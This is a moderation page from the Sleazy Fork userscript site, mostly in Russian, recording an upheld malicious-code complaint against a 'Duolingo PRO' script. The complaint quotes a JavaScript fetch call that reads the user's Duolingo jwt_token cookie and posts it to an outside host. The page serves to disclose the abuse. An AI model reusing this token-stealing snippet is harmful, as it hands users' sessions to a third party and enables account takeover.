Sleazy Fork

23.03.2025 на «Duolingo PRO» поступила жалоба по причине: Вредоносный код

This script grabs the JWT token of duolingo and sends it to a fishy link code below:

let apiURL = "https://api.duolingopro.net";

This is the real payload part

            const response = await fetch(apiURL + "/feedback", {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                    'Authorization': `Bearer ${document.cookie.split(';').find(cookie => cookie.includes('jwt_token')).split('=')[1]}`
                },
                body: JSON.stringify(payload)
            });

У этого скрипта была 1 удовлетворённая или решённая жалоба.

Действия anonymoushackerIV, на которого поступила жалоба:

• 1 скрипт
• 97 комментариев

Действия interstellar, на которого поступила жалоба:

• 1 скрипт
• 0 комментариев

Эта жалоба была удовлетворена модератором.